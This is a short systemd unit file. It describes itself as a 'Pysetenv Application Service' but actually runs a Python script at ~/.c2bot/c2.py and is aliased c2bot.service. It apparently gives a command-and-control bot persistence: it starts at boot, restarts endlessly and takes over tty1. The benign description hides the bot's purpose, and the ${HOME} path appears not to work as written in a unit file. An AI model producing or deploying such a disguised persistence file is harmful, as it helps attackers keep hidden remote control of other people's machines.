[Unit]
Description=Pysetenv Application Service
After=multi-user.target
Conflicts=getty@tty1.service

[Service]
Type=simple
Restart=always
ExecStart=/usr/bin/python3 ${HOME}/.c2bot/c2.py
StandardInput=tty-force

[Install]
WantedBy=multi-user.target
Alias=c2bot.service